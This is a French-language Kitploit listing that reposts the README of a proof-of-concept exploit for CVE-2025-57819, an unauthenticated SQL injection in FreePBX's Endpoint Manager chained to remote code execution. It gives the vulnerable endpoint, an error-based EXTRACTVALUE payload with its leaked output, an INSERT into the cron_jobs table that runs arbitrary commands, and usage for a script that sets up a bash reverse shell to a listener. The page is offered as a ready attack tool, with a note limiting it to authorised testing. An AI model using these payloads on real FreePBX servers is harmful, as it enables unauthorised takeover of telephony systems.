Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
Outils/GitHubGitHub/b4sh2/cve-2025-57819-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

Voir le dépôt
7246il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-57819 — FreePBX SQLi non authentifiée → RCE

Exploit one-shot pour l'injection SQL non authentifiée du Endpoint Manager de FreePBX (CVE-2025-57819), chaînée en exécution de code à distance via la table cron_jobs de FreePBX.

Réservé aux tests de sécurité autorisés / CTF.


Vulnérabilité

Le gestionnaire Ajax du module endpoint concatène le paramètre brand directement dans une requête SQL, et le chemin du module FreePBX\modules\endpoint\ajax contourne la vérification Referrer/authentification Ajax. Cela donne une injection SQL non authentifiée basée sur les erreurs (via EXTRACTVALUE), avec des écritures par requêtes empilées activées.

Point d'injection :

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

Preuve (lecture par erreur) :

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
Télécharger l’outil

Versions concernées : FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

Technique RCE

L'injection est en lecture seule par elle-même, mais les requêtes empilées permettent les écritures. FreePBX exécute les tâches de la table cron_jobs via son gestionnaire cron, donc insérer une ligne permet l'exécution arbitraire de commandes (dans les ~60s, planification * * * * *) :

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

La commande injectée est un reverse shell bash. La ligne cron est supprimée automatiquement après le premier callback pour éviter des connexions répétées.

Prérequis

root@kitploit:~
pip install requests urllib3

Python 3. La détection d'IP intégrée (-i/--interface) est Linux uniquement ; utilisez --ip sur les autres plateformes.

Utilisation

root@kitploit:~
# Défauts : interface tun0, port 4444 — démarre l'écouteur, exploite, donne un shell
python3 exploit.py http://{cible}

# Choisir une interface / un port différent
python3 exploit.py http://{cible} -i eth0 -p 9001

# Définir l'IP de l'écouteur explicitement
python3 exploit.py http://{cible} --ip 10.10.15.52

python3 exploit.py --help

Le script :

  1. Confirme l'injection SQL (divulgue la version de la base).
  2. Démarre un écouteur TCP sur le port choisi.
  3. Injecte la tâche cron de reverse shell et vérifie que la ligne est bien présente.
  4. Attend ~70s le callback, puis vous place dans un shell interactif (avec une tentative de mise à niveau automatique du PTY).
  5. Nettoie la ligne cron injectée.

Références

  • Horizon3.ai — Updated FreePBX CVEs: Auth Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX advisory GHSA-m42g-xg4c-5f3h